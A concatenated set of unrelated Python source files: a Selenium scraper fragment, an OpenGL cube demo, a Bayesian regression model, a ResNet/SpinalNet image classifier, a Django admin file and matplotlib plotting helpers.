lis = elem.find_elements_by_tag_name('li')
for li in lis:
atag= li.find_element_by_class_name('sh_cafe_title')
title = atag.get_attribute('title')
if not title: #속성으로 찾을 수 없을 경우
title = atag.text
print(title)
print(atag.get_attribute('href'))
except Exception as e:
print('None')
input()
except Exception as e:
print(e)
finally:
driver.quit()
|
15,141 | 4e9e75ae7a7283767eb3159ab80829ef221704e3 | import pygame
from pygame.locals import *
from OpenGL.GL import *
from OpenGL.GLU import *
# Unit-cube geometry shared by cube() and CubeObject.
# Eight corner coordinates of a 2x2x2 cube centred on the origin.
vertices = (
    (1,-1,-1),
    (1,1,-1),
    (-1,1,-1),
    (-1,-1,-1),
    (1,-1,1),
    (1,1,1),
    (-1,-1,1),
    (-1,1,1) )
# Pairs of vertex indices forming the 12 edges (drawn as the wireframe).
edges = (
    (0,1),
    (0,3),
    (0,4),
    (2,1),
    (2,3),
    (2,7),
    (6,3),
    (6,4),
    (6,7),
    (5,1),
    (5,4),
    (5,7)
    )
# Quads of vertex indices, one per cube face.
surfaces = (
    (0,1,2,3),
    (3,2,7,6),
    (6,7,5,4),
    (4,5,1,0),
    (1,5,7,2),
    (4,0,3,6)
    )
# RGB palette; cube() consumes entries 1..6 (one colour per face).
colors = (
    (1,0,0),
    (0,1,0),
    (0,0,1),
    (1,0,1),
    (1,1,0),
    (1,0,0),
    (0,1,0),
    (0,0,1),
    (1,0,1),
    (1,1,0),
    (0,1,1)
    )
class CubeObject():
    """A unit cube translated by a fixed (x, y, z) offset.

    Fixes two defects in the original:
      * __init__ accidentally nested the same loop twice, storing 64
        duplicate vertices instead of 8;
      * render() drew the module-level `vertices`, so the offset copy was
        never used and every cube appeared at the origin.
    """

    def __init__(self, xoffset, yoffset, zoffset):
        self._vertices = []
        for vertex in vertices:
            self._vertices.append((vertex[0] + xoffset,
                                   vertex[1] + yoffset,
                                   vertex[2] + zoffset))

    def render(self):
        # Filled faces first...
        glBegin( GL_QUADS )
        glColor( 0, 1, 0 )
        for surface in surfaces:
            for vertex in surface:
                glVertex3fv( self._vertices[vertex] )
        glEnd()
        # ...then the black wireframe on top.
        glBegin( GL_LINES )
        glColor( 0, 0, 0 )
        for edge in edges:
            for vertex in edge:
                glVertex3fv( self._vertices[vertex] )
        glEnd()
def cube():
    """Draw one multi-coloured cube at the origin: filled faces, then wireframe."""
    glBegin( GL_QUADS )
    colorIndex = 0
    for surface in surfaces:
        colorIndex += 1
        # One colour per face, hoisted out of the vertex loop (the original
        # re-read and re-applied the same palette entry for every vertex).
        # The palette is intentionally consumed from index 1 upward.
        thisColor = colors[colorIndex]
        glColor( thisColor[0], thisColor[1], thisColor[2] )
        for vertex in surface:
            glVertex3fv( vertices[vertex] )
    glEnd()
    glBegin( GL_LINES )
    glColor( 0, 0, 0 )
    for edge in edges:
        for vertex in edge:
            glVertex3fv(vertices[vertex])
    glEnd()
def main():
    """Open an 800x600 OpenGL window and render three offset cubes.

    Arrow keys pan the camera left/right; the mouse wheel (buttons 4/5)
    zooms in and out.  Runs until the window is closed.
    """
    pygame.init()
    mycube = CubeObject( .1, .2, .3 )
    mycube2 = CubeObject( .1, .8, .3 )
    mycube3 = CubeObject( -1.0, .2, .9 )
    display = (800,600)
    pygame.display.set_mode( display, DOUBLEBUF|OPENGL )
    # 45-degree field of view, near/far clip planes at 0.1/50.
    gluPerspective( 45, (display[0]/display[1]), 0.1, 50.0 )
    glTranslate( 0,0,-5)
    glRotatef(0,0,0,0)
    while True:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_LEFT:
                    glTranslate( -0.1,0,0)
                if event.key == pygame.K_RIGHT:
                    glTranslate( .1,0,0)
            if event.type == MOUSEBUTTONDOWN:
                # Buttons 4/5 are wheel-up/wheel-down: zoom the scene.
                if event.button == 4:
                    glTranslate( 0,0,1)
                if event.button == 5:
                    glTranslate( 0,0,-1)
        glClear( GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT )
        # cube()
        mycube.render()
        mycube2.render()
        mycube3.render()
        pygame.display.flip()
        pygame.time.wait(10)
        #glRotatef( .5,1,1.5,0)
main()
|
15,142 | d97dd7345c1522f2e10ba314525e478e7422edaa | #!python3
"""
##### Task 1
Ask the user to enter an integer.
Print the multiplication tables up to 12 for that number
using a for loop instead of a while loop.
(2 points)
inputs:
int number
outputs:
multiples of that number
example:
Enter number:4
4 8 12 16 20 24 28 32 36 40 44 48
"""
number = input("Enter number:")
number = int(number)
for i in range(1, 13):
print(number * i, end=" ") |
15,143 | 63afc72dad731d0df390427467ea0fdb997da5ab | #!/usr/bin/env python
import os
import pickle
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
# Short aliases for the TensorFlow Probability namespaces used below.
tf_bijs = tfp.bijectors
tf_dist = tfp.distributions
tf_mean_field = tfp.layers.default_mean_field_normal_fn
#==============================================================
class RegressionModel(object):
    """Bayesian MLP regressor built on TF1-style graphs and TFP mean-field layers.

    Features/targets are rescaled according to `config` using statistics read
    from a pickled `dataset_details` file.  Four DenseLocalReparameterization
    layers form the network; training minimises negative log-likelihood plus
    a KL regulariser, with R^2-based early stopping and checkpointing.
    """
    # Default hyperparameters; overridable via set_hyperparameters().
    NUM_SAMPLES = 1
    ACT_FUNC = 'leaky_relu'
    ACT_FUNC_OUT = 'linear'
    LEARNING_RATE = 0.75 * 10**-3
    MLP_SIZE = 48
    REG = 1e-3
    DROP = 0.1
    def __init__(self, graph, dataset_details, config, scope, batch_size, max_iter = 10**8):
        """Store configuration and load feature/target scaling statistics.

        graph           : tf.Graph the model ops are built into
        dataset_details : path to a pickle with scaling stats and shapes
        config          : dict with 'feature_rescaling' / 'target_rescaling'
        scope           : name scope for the model ops
        batch_size      : fixed placeholder batch size
        max_iter        : upper bound on training epochs (early stop usual)
        """
        self.graph = graph
        self.scope = scope
        self.config = config
        self.batch_size = batch_size
        self.dataset_details = dataset_details
        self.max_iter = max_iter
        self.is_graph_constructed = False
        self._read_scaling_details()
    def _generator(self, features, targets, batch_size):
        """Yield endless random (features, targets) mini-batches."""
        indices = np.arange(len(features))
        while True:
            np.random.shuffle(indices)
            batch_features = features[indices[:batch_size]]
            batch_targets = targets[indices[:batch_size]]
            yield (batch_features, batch_targets)
    def _read_scaling_details(self):
        """Load scaling statistics and data shapes from the details pickle."""
        with open(self.dataset_details, 'rb') as content:
            details = pickle.load(content)
        self.scaling = {key: details[key] for key in details}
        self.features_shape = self.scaling['features_shape']
        self.targets_shape = self.scaling['targets_shape']
    def get_scaled_features(self, features):
        """Rescale raw features per config (standardization or unit cube)."""
        if self.config['feature_rescaling'] == 'standardization':
            scaled = (features - self.scaling['mean_features']) / self.scaling['std_features']
        elif self.config['feature_rescaling'] == 'unit_cube':
            scaled = (features - self.scaling['min_features']) / (self.scaling['max_features'] - self.scaling['min_features'])
        return scaled
    def get_scaled_targets(self, targets):
        """Rescale raw targets per config; inverse of get_raw_targets()."""
        if self.config['target_rescaling'] == 'standardization':
            scaled = (targets - self.scaling['mean_targets']) / self.scaling['std_targets']
        elif self.config['target_rescaling'] == 'unit_cube':
            scaled = (targets - self.scaling['min_targets']) / (self.scaling['max_targets'] - self.scaling['min_targets'])
        elif self.config['target_rescaling'] == 'mean':
            scaled = targets / self.scaling['mean_targets']
        elif self.config['target_rescaling'] == 'same':
            scaled = targets
        return scaled
    def get_raw_targets(self, targets):
        """Map scaled targets back to raw units; inverse of get_scaled_targets()."""
        if self.config['target_rescaling'] == 'standardization':
            raw = targets * self.scaling['std_targets'] + self.scaling['mean_targets']
        elif self.config['target_rescaling'] == 'unit_cube':
            raw = (self.scaling['max_targets'] - self.scaling['min_targets']) * targets + self.scaling['min_targets']
        elif self.config['target_rescaling'] == 'mean':
            raw = targets * self.scaling['mean_targets']
        elif self.config['target_rescaling'] == 'same':
            raw = targets
        return raw
    def set_hyperparameters(self, hyperparam_dict):
        """Override class-level hyperparameters (e.g. MLP_SIZE, REG) per instance."""
        for key, value in hyperparam_dict.items():
            setattr(self, key, value)
    def construct_graph(self):
        """Build placeholders, the 4-layer Bayesian MLP and the output distribution."""
        act_funcs = {
            'linear': lambda y: y,
            'leaky_relu': lambda y: tf.nn.leaky_relu(y, 0.2),
            'relu': lambda y: tf.nn.relu(y),
            'softmax': lambda y: tf.nn.softmax(y),
            'softplus': lambda y: tf.nn.softplus(y),
            'softsign': lambda y: tf.nn.softsign(y),
            'sigmoid': lambda y: tf.nn.sigmoid(y),
        }
        mlp_activation = act_funcs[self.ACT_FUNC]
        out_activation = act_funcs[self.ACT_FUNC_OUT]
        with self.graph.as_default():
            with tf.name_scope(self.scope):
                self.is_training = tf.compat.v1.placeholder(tf.bool, shape = ())
                self.x_ph = tf.compat.v1.placeholder(tf.float32, [self.batch_size, self.features_shape[1]])
                self.y_ph = tf.compat.v1.placeholder(tf.float32, [self.batch_size, self.targets_shape[1]])
                self.layer_0 = tfp.layers.DenseLocalReparameterization(
                    self.MLP_SIZE,
                    activation = mlp_activation,
                )
                layer_0_act = self.layer_0(self.x_ph)
                layer_0_out = tf.layers.dropout(layer_0_act, rate = self.DROP, training = self.is_training)
                self.layer_1 = tfp.layers.DenseLocalReparameterization(
                    self.MLP_SIZE,
                    activation = mlp_activation,
                )
                layer_1_act = self.layer_1(layer_0_out)
                layer_1_out = tf.layers.dropout(layer_1_act, rate = self.DROP, training = self.is_training)
                self.layer_2 = tfp.layers.DenseLocalReparameterization(
                    self.MLP_SIZE,
                    activation = mlp_activation,
                )
                layer_2_act = self.layer_2(layer_1_out)
                # NOTE: no dropout after layer 2 (unlike layers 0 and 1).
                layer_2_out = layer_2_act
                self.layer_3 = tfp.layers.DenseLocalReparameterization(
                    self.targets_shape[1],
                    activation = out_activation,
                )
                layer_3_out = self.layer_3(layer_2_out)
                self.net_out = layer_3_out
                # Learned homoscedastic noise scale (softplus keeps it > 0).
                self.scales = tf.nn.softplus(tf.Variable(tf.zeros(1)))
                self.y_pred = tf_dist.Normal(self.net_out, scale = self.scales)
    def construct_inference(self):
        """Build losses, the Adam train op, and initialise a fresh session."""
        self.is_graph_constructed = True
        with self.graph.as_default():
            # KL terms of all variational layers, scaled to the batch size.
            self.kl = sum(self.layer_0.losses) / float(self.batch_size)
            self.kl += sum(self.layer_1.losses) / float(self.batch_size)
            self.kl += sum(self.layer_2.losses) / float(self.batch_size)
            self.kl += sum(self.layer_3.losses) / float(self.batch_size)
            # Negative log-likelihood + weighted KL = (approximate) ELBO loss.
            self.reg_loss = - tf.reduce_mean( self.y_pred.log_prob(self.y_ph) )
            self.loss = self.reg_loss + self.REG * self.kl
            self.optimizer = tf.compat.v1.train.AdamOptimizer(self.LEARNING_RATE)
            self.train_op = self.optimizer.minimize(self.loss)
            self.init_op = tf.group(tf.compat.v1.global_variables_initializer(), tf.compat.v1.local_variables_initializer())
            self.sess = tf.compat.v1.Session(graph = self.graph)
            with self.sess.as_default():
                self.sess.run(self.init_op)
    def train(self, train_features, train_targets, valid_features, valid_targets, model_path, plot = False, targets = 'same'):
        """Train with R^2-based early stopping; checkpoint best model to model_path.

        Evaluates every 200 epochs, logs R^2 to <model_path>/logfile.dat and
        stops once the best validation R^2 is >100 evaluations old.
        targets='probs' applies a sigmoid before scoring/plotting.
        """
        from sklearn.metrics import r2_score
        if not os.path.isdir(model_path): os.mkdir(model_path)
        # Truncate any previous log file.
        logfile = open('%s/logfile.dat' % model_path, 'w')
        logfile.close()
        if not self.is_graph_constructed: self.construct_inference()
        train_feat_scaled = self.get_scaled_features(train_features)
        train_targ_scaled = self.get_scaled_targets(train_targets)
        valid_feat_scaled = self.get_scaled_features(valid_features)
        valid_targ_scaled = self.get_scaled_targets(valid_targets)
        # Axis limits for the optional diagnostic plots.
        min_target, max_target = np.minimum(np.amin(train_targets, axis = 0), np.amin(valid_targets, axis = 0)), np.maximum(np.amax(train_targets, axis = 0), np.amax(valid_targets, axis = 0))
        if targets == 'probs':
            min_target = 1. / (1. + np.exp( - min_target))
            max_target = 1. / (1. + np.exp( - max_target))
        batch_train_gen = self._generator(train_feat_scaled, train_targ_scaled, self.batch_size)
        batch_valid_gen = self._generator(valid_feat_scaled, valid_targ_scaled, self.batch_size)
        train_errors, valid_errors = [], []
        with self.graph.as_default():
            with self.sess.as_default():
                self.saver = tf.compat.v1.train.Saver()
                if plot:
                    import matplotlib.pyplot as plt
                    import seaborn as sns
                    colors = sns.color_palette('RdYlGn', 4)
                    plt.ion()
                    plt.style.use('dark_background')
                    fig = plt.figure(figsize = (14, 5))
                    ax0 = plt.subplot2grid((1, 3), (0, 0))
                    ax1 = plt.subplot2grid((1, 3), (0, 1))
                    ax2 = plt.subplot2grid((1, 3), (0, 2))
                for epoch in range(self.max_iter):
                    train_x, train_y = next(batch_train_gen)
                    valid_x, valid_y = next(batch_valid_gen)
                    self.sess.run(self.train_op, feed_dict = {self.x_ph: train_x, self.y_ph: train_y, self.is_training: True})
                    # Periodic evaluation / logging / checkpointing.
                    if epoch % 200 == 0:
                        valid_preds = self.sess.run(self.net_out, feed_dict = {self.x_ph: valid_x, self.is_training: False})
                        valid_y = self.get_raw_targets(valid_y)
                        valid_preds = self.get_raw_targets(valid_preds)
                        if targets == 'probs':
                            valid_y = 1. / (1. + np.exp( - valid_y))
                            valid_preds = 1. / (1. + np.exp( - valid_preds))
                        try:
                            valid_r2 = r2_score(valid_y, valid_preds)
                        except:
                            valid_r2 = np.nan
                        valid_errors.append(valid_r2)
                        _1_, _2_ = self.sess.run([self.reg_loss, self.kl], feed_dict = {self.x_ph: train_x, self.y_ph: train_y, self.is_training: False})
                        print('...', _1_, _2_)
                        train_preds = self.sess.run(self.net_out, feed_dict = {self.x_ph: train_x, self.is_training: False})
                        train_y = self.get_raw_targets(train_y)
                        train_preds = self.get_raw_targets(train_preds)
                        try:
                            train_r2 = r2_score(train_y, train_preds)
                        except:
                            train_r2 = np.nan
                        train_errors.append(train_r2)
                        if targets == 'probs':
                            train_y = 1. / (1. + np.exp( - train_y))
                            train_preds = 1. / (1. + np.exp( - train_preds))
                        logfile = open('%s/logfile.dat' % model_path, 'a')
                        logfile.write('%d\t%.5f\t%.5f\n' % (epoch, train_r2, valid_r2))
                        logfile.close()
                        # define break condition --> last improvement happened more than 100 epochs ago
                        max_r2_index = np.argmax(valid_errors)
                        if len(valid_errors) - max_r2_index > 100: break
                        if max_r2_index == len(valid_errors) - 1:
                            # New best validation R^2 --> checkpoint.
                            self.saver.save(self.sess, '%s/model.ckpt' % model_path)
                        new_line = 'EVALUATION: %d (%d)\t%.5f\t%.5f' % ( len(valid_errors) - max_r2_index, len(valid_errors), train_errors[-1], valid_errors[-1])
                        print(new_line)
                        if plot:
                            train_preds_scaled = train_preds
                            train_trues_scaled = train_y
                            valid_preds_scaled = valid_preds
                            valid_trues_scaled = valid_y
                            ax0.cla()
                            ax1.cla()
                            ax2.cla()
                            ax0.plot([min_target[0], max_target[0]], [min_target[0], max_target[0]], lw = 3, color = 'w', alpha = 0.5)
                            ax0.plot(train_trues_scaled[:, 0], train_preds_scaled[:, 0], marker = '.', ls = '', color = colors[-1], alpha = 0.5)
                            ax0.plot(valid_trues_scaled[:, 0], valid_preds_scaled[:, 0], marker = '.', ls = '', color = colors[0], alpha = 0.5)
                            if len(min_target) > 1:
                                ax1.plot([min_target[1], max_target[1]], [min_target[1], max_target[1]], lw = 3, color = 'w', alpha = 0.5)
                                ax1.plot(train_trues_scaled[:, 1], train_preds_scaled[:, 1], marker = '.', ls = '', color = colors[-1], alpha = 0.5)
                                ax1.plot(valid_trues_scaled[:, 1], valid_preds_scaled[:, 1], marker = '.', ls = '', color = colors[0], alpha = 0.5)
                            RANGE = 50
                            ax2.plot(np.arange(len(train_errors[-RANGE:])) + len(train_errors[-RANGE:]), train_errors[-RANGE:], lw = 3, color = colors[-1])
                            ax2.plot(np.arange(len(valid_errors[-RANGE:])) + len(valid_errors[-RANGE:]), valid_errors[-RANGE:], lw = 3, color = colors[0])
                            plt.pause(0.05)
    def restore(self, model_path):
        """Restore a checkpoint into a fresh session; True on success, False otherwise."""
        if not self.is_graph_constructed: self.construct_inference()
        self.sess = tf.compat.v1.Session(graph = self.graph)
        self.saver = tf.compat.v1.train.Saver()
        try:
            self.saver.restore(self.sess, model_path)
            return True
        except AttributeError:
            return False
    def predict(self, input_raw):
        """Return Monte-Carlo predictions for raw-unit inputs.

        Draws NUM_SAMPLES stochastic forward passes and reports raw-unit
        samples plus their per-point mean and standard deviation.
        """
        input_scaled = self.get_scaled_features(input_raw)
        with self.sess.as_default():
            output_scaled = []
            for _ in range(self.NUM_SAMPLES):
                output_scaled.append(self.sess.run(self.net_out, feed_dict = {self.x_ph: input_scaled, self.is_training: False}))
            output_scaled = np.array(output_scaled)
            output_raw = self.get_raw_targets(output_scaled)
            output_raw_mean = np.mean(output_raw, axis = 0)
            output_raw_std = np.std(output_raw, axis = 0)
            return {'samples': output_raw, 'averages': output_raw_mean, 'uncertainties': output_raw_std}
#==============================================================
|
15,144 | e47330768491b72c9bf43337c706d03d635ca720 | ################################################################################
# Experiment No. 11
#
# Generating weekly heatmaps for stations
#
#
|
15,145 | 976d468cd39493e7410ca9ce30e217b1345b6a25 | import os
import pandas as pd
import torch
import torch.nn as nn
from torchvision import datasets,models,transforms
from torch.utils.tensorboard import SummaryWriter
import time, os, copy
image_transforms = {
'train': transforms.Compose([
transforms.RandomResizedCrop(size=256, scale=(0.8, 1.0)),
transforms.RandomRotation(degrees=15),
transforms.CenterCrop(size=224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])
]),
'valid': transforms.Compose([
transforms.Resize(size=256),
transforms.CenterCrop(size=224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])
])
}
train_path='/home/abhinav/kaggle/intel_image_classification/input/train/'
val_path='/home/abhinav/kaggle/intel_image_classification/input/val/'
saving_path={
'mobile_net':"/home/abhinav/kaggle/intel_image_classification/models/mobilenetv2.pth",
'resnet50':"/home/abhinav/kaggle/intel_image_classification/models/resnet50.pth",
'SpinalNet_ResNet':"/home/abhinav/kaggle/intel_image_classification/models/SpinalNet_ResNet.pth"
}
dataset = {
'train': datasets.ImageFolder(root=train_path, transform=image_transforms['train']),
'valid': datasets.ImageFolder(root=val_path, transform=image_transforms['valid'])
}
dataset_sizes = {
'train':len(dataset['train']),
'valid':len(dataset['valid'])
}
dataloaders = {
'train':torch.utils.data.DataLoader(dataset['train'], batch_size=32, shuffle=True),
'valid':torch.utils.data.DataLoader(dataset['valid'], batch_size=32, shuffle=True,)
}
class_names = dataset['train'].classes
print("Classes:", class_names)
print("Training-set size:",dataset_sizes['train'],
"\nValidation-set size:", dataset_sizes['valid'])
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device," is available")
# print("\nLoading mobilenetv2 ...\n")
# model_ft = models.mobilenet_v2(pretrained=True)
# for params in list(model_ft.parameters())[0:-5]:
# params.requires_grad = False
# model_ft = models.resnet50(pretrained=True)
# for params in list(model_ft.parameters())[0:-5]:
# params.requires_grad = False
# # num_ftrs=model_ft.classifier[-1].in_features
# num_ftrs = model_ft.fc.in_features
# model_ft.fc=nn.Sequential(
# nn.Dropout(p=0.2, inplace=False),
# nn.Linear(in_features=num_ftrs, out_features=6, bias=True)
# )
# model_ft = model_ft.to(device)
model_ft = models.resnet50(pretrained=True)
num_ftrs = model_ft.fc.in_features
half_in_size = round(num_ftrs/2)
layer_width = 12 #Small for Resnet, large for VGG
Num_class=6
class SpinalNet_ResNet(nn.Module):
    """SpinalNet classification head replacing ResNet-50's final fc layer.

    The input feature vector is split into two halves; four narrow "spinal"
    layers each see one half of the input concatenated with the previous
    layer's output, and their stacked activations feed the output layer.
    """

    def __init__(self):
        super(SpinalNet_ResNet, self).__init__()

        def spinal_block(in_features):
            # Linear -> ReLU; Dropout/BatchNorm deliberately omitted.
            return nn.Sequential(
                nn.Linear(in_features, layer_width),
                nn.ReLU(inplace=True),
            )

        # Attribute names/order preserved so checkpoints remain loadable.
        self.fc_spinal_layer1 = spinal_block(half_in_size)
        self.fc_spinal_layer2 = spinal_block(half_in_size + layer_width)
        self.fc_spinal_layer3 = spinal_block(half_in_size + layer_width)
        self.fc_spinal_layer4 = spinal_block(half_in_size + layer_width)
        self.fc_out = nn.Sequential(
            nn.Linear(layer_width * 4, Num_class),
        )

    def forward(self, x):
        first_half = x[:, 0:half_in_size]
        second_half = x[:, half_in_size:2 * half_in_size]
        # Alternate halves down the "spine", chaining each layer's output.
        x1 = self.fc_spinal_layer1(first_half)
        x2 = self.fc_spinal_layer2(torch.cat([second_half, x1], dim=1))
        x3 = self.fc_spinal_layer3(torch.cat([first_half, x2], dim=1))
        x4 = self.fc_spinal_layer4(torch.cat([second_half, x3], dim=1))
        stacked = torch.cat([x1, x2, x3, x4], dim=1)
        return self.fc_out(stacked)
# Replace the ResNet50 classifier with the SpinalNet head and move to device.
model_ft.fc=SpinalNet_ResNet()
model_ft.to(device)
# print('Model Summary:-\n')
# List every parameter and whether it will be trained (all True here —
# no layers are frozen in this configuration).
for num, (name, param) in enumerate(model_ft.named_parameters()):
    print(num, name, param.requires_grad )
# summary(model_ft, input_size=(3, 224, 224))
print(model_ft)
criterion = nn.CrossEntropyLoss()
# SGD with momentum over ALL parameters (backbone is fine-tuned too).
optimizer_ft = torch.optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9)
# Decay the learning rate by 10x every 7 epochs.
exp_lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer_ft, step_size=7, gamma=0.1)
print("\nTraining:-\n")
def train_model(model, criterion, optimizer, scheduler, num_epochs=30):
    """Train/validate `model` and return it loaded with the best weights.

    Runs one training and one validation phase per epoch, logs per-epoch
    loss/accuracy to TensorBoard, and keeps a deep copy of the weights that
    achieved the highest validation accuracy.

    Relies on the module-level globals `dataloaders`, `dataset_sizes` and
    `device`.

    Args:
        model: the network to optimize (already on `device`).
        criterion: loss function, e.g. CrossEntropyLoss.
        optimizer: optimizer over `model.parameters()`.
        scheduler: LR scheduler stepped once per epoch after training.
        num_epochs: number of full train+valid passes.

    Returns:
        The model with the best-validation-accuracy weights loaded.
    """
    since = time.time()
    best_model_wts = copy.deepcopy(model.state_dict())
    best_acc = 0.0
    # Tensorboard summary
    writer = SummaryWriter()
    for epoch in range(num_epochs):
        print('Epoch {}/{}'.format(epoch, num_epochs - 1))
        print('-' * 10)
        # Each epoch has a training and validation phase
        for phase in ['train', 'valid']:
            if phase == 'train':
                model.train()  # Set model to training mode
            else:
                model.eval()  # Set model to evaluate mode
            running_loss = 0.0
            running_corrects = 0
            # Iterate over data.
            for inputs, labels in dataloaders[phase]:
                inputs = inputs.to(device, non_blocking=True)
                labels = labels.to(device, non_blocking=True)
                # zero the parameter gradients
                optimizer.zero_grad()
                # forward; track gradient history only while training
                with torch.set_grad_enabled(phase == 'train'):
                    outputs = model(inputs)
                    _, preds = torch.max(outputs, 1)
                    loss = criterion(outputs, labels)
                    # backward + optimize only if in training phase
                    if phase == 'train':
                        loss.backward()
                        optimizer.step()
                # statistics (loss is a per-batch mean, so re-weight by batch size)
                running_loss += loss.item() * inputs.size(0)
                running_corrects += torch.sum(preds == labels.data)
            if phase == 'train':
                scheduler.step()
            epoch_loss = running_loss / dataset_sizes[phase]
            epoch_acc = running_corrects.double() / dataset_sizes[phase]
            print('{} Loss: {:.4f} Acc: {:.4f}'.format(
                phase, epoch_loss, epoch_acc))
            # Record loss and accuracy for each phase
            if phase == 'train':
                writer.add_scalar('Train/Loss', epoch_loss, epoch)
                writer.add_scalar('Train/Accuracy', epoch_acc, epoch)
                writer.flush()
            else:
                writer.add_scalar('Valid/Loss', epoch_loss, epoch)
                writer.add_scalar('Valid/Accuracy', epoch_acc, epoch)
                writer.flush()
            # deep copy the model whenever validation accuracy improves
            if phase == 'valid' and epoch_acc > best_acc:
                best_acc = epoch_acc
                best_model_wts = copy.deepcopy(model.state_dict())
        print()
    time_elapsed = time.time() - since
    print('Training complete in {:.0f}m {:.0f}s'.format(
        time_elapsed // 60, time_elapsed % 60))
    print('Best val Acc: {:4f}'.format(best_acc))
    # FIX: close the SummaryWriter — the original leaked the event-file
    # handle, which can lose the tail of the log on interpreter exit.
    writer.close()
    # load best model weights
    model.load_state_dict(best_model_wts)
    return model
# Fine-tune for 10 epochs (the function default of 30 is overridden here).
model_ft = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler,
                       num_epochs=10)
# Save the entire model (architecture + weights, via pickle).
# NOTE(review): `saving_path` is defined elsewhere in this script — confirm
# the 'SpinalNet_ResNet' key exists.
print("\nSaving the model...")
torch.save(model_ft, saving_path['SpinalNet_ResNet'])
|
15,146 | a4fdb3c5a3f9aec5d8956862dc01bd170ca6823b | from django.contrib import admin
from .models import Bucketlist, Item
@admin.register(Bucketlist)
class BucketlistAdmin(admin.ModelAdmin):
    """Default admin configuration for Bucketlist (no customization)."""


@admin.register(Item)
class ItemAdmin(admin.ModelAdmin):
    """Default admin configuration for Item (no customization)."""
|
15,147 | c767bfa22d100e4e5054519bbcef220d010726b4 | import matplotlib.pyplot as plt
from IPython import display
from torch.utils import data
import torch
import os
import hashlib
import requests
import collections
import re
import random
import numpy as np
import torch.nn as nn
import time
import math
from torch.nn import functional as F
import zipfile
def use_svg_display():
    """Use the svg format to display a plot in Jupyter.

    NOTE(review): `display.set_matplotlib_formats` is deprecated in recent
    IPython in favor of `matplotlib_inline.backend_inline` — verify the
    target IPython version.
    """
    display.set_matplotlib_formats('svg')
def set_figsize(figsize=(3.5, 2.5)):
    """Set the default figure size for matplotlib (also switches to SVG)."""
    use_svg_display()
    plt.rcParams['figure.figsize'] = figsize
# Defined in file: ./chapter_preliminaries/calculus.md
def set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):
    """Configure labels, scales, limits, legend and grid on `axes`.

    `legend` is a (possibly empty) sequence of labels; an empty sequence
    suppresses the legend entirely.
    """
    axes.set_xlabel(xlabel)
    axes.set_ylabel(ylabel)
    axes.set_xscale(xscale)
    axes.set_yscale(yscale)
    axes.set_xlim(xlim)
    axes.set_ylim(ylim)
    if legend:
        axes.legend(legend)
    axes.grid()
def plot(X, Y=None, xlabel=None, ylabel=None, legend=None, xlim=None,
         ylim=None, xscale='linear', yscale='linear',
         fmts=('-', 'm--', 'g-.', 'r:'), figsize=(3.5, 2.5), axes=None):
    """Plot data points.

    `X`/`Y` may each be a single 1-D sequence or a list of sequences; a
    single `X` is broadcast across multiple `Y` curves. When `Y` is None,
    `X` is plotted against its index. `fmts` cycles one matplotlib format
    string per curve.
    """
    if legend is None:
        legend = []
    set_figsize(figsize)
    axes = axes if axes else plt.gca()
    # Return True if `X` (tensor or list) has 1 axis
    def has_one_axis(X):
        return (hasattr(X, "ndim") and X.ndim == 1 or
                isinstance(X, list) and not hasattr(X[0], "__len__"))
    if has_one_axis(X):
        X = [X]
    if Y is None:
        # No Y given: treat X as the y-data and use empty x-data (index plot).
        X, Y = [[]] * len(X), X
    elif has_one_axis(Y):
        Y = [Y]
    if len(X) != len(Y):
        # Reuse the single x-sequence for every y-curve.
        X = X * len(Y)
    axes.cla()
    for x, y, fmt in zip(X, Y, fmts):
        if len(x):
            axes.plot(x, y, fmt)
        else:
            axes.plot(y, fmt)
    set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend)
def show_heatmaps(matrices, xlabel, ylabel, titles=None, figsize=(2.5, 2.5),
                  cmap='Reds'):
    """Display a grid of heatmaps (e.g. attention weights).

    `matrices` is indexed as (rows, cols, height, width); one subplot is
    drawn per (row, col) entry. Axis labels are only drawn on the outer
    edge of the grid; a shared colorbar is added on the right.
    """
    use_svg_display()
    num_rows, num_cols = matrices.shape[0], matrices.shape[1]
    fig, axes = plt.subplots(num_rows, num_cols, figsize=figsize,
                             sharex=True, sharey=True, squeeze=False)
    for i, (row_axes, row_matrices) in enumerate(zip(axes, matrices)):
        for j, (ax, matrix) in enumerate(zip(row_axes, row_matrices)):
            pcm = ax.imshow(torch.tensor(matrix), cmap=cmap)
            if i == num_rows - 1:
                ax.set_xlabel(xlabel)
            if j == 0:
                ax.set_ylabel(ylabel)
                if titles:
                    ax.set_title(titles[j])
    fig.colorbar(pcm, ax=axes, shrink=0.6)
class Animator:  #@save
    """For plotting data in animation (live-updating curves in a notebook).

    Each call to `add` appends points to up to `len(fmts)` curves and
    redraws the whole figure via IPython display/clear_output.
    """
    def __init__(self, xlabel=None, ylabel=None, legend=None, xlim=None,
                 ylim=None, xscale='linear', yscale='linear',
                 fmts=('-', 'm--', 'g-.', 'r:'), nrows=1, ncols=1,
                 figsize=(3.5, 2.5)):
        # Incrementally plot multiple lines
        if legend is None:
            legend = []
        use_svg_display()
        self.fig, self.axes = plt.subplots(nrows, ncols, figsize=figsize)
        if nrows * ncols == 1:
            # Normalize to a list so self.axes[0] works in both layouts.
            self.axes = [self.axes, ]
        # Use a lambda function to capture arguments
        self.config_axes = lambda: set_axes(
            self.axes[0], xlabel, ylabel, xlim, ylim, xscale, yscale, legend)
        self.X, self.Y, self.fmts = None, None, fmts

    def add(self, x, y):
        # Add multiple data points into the figure.
        # `y` may be a scalar or a sequence (one value per curve); a scalar
        # `x` is replicated across all curves.
        if not hasattr(y, "__len__"):
            y = [y]
        n = len(y)
        if not hasattr(x, "__len__"):
            x = [x] * n
        if not self.X:
            self.X = [[] for _ in range(n)]
        if not self.Y:
            self.Y = [[] for _ in range(n)]
        for i, (a, b) in enumerate(zip(x, y)):
            if a is not None and b is not None:
                self.X[i].append(a)
                self.Y[i].append(b)
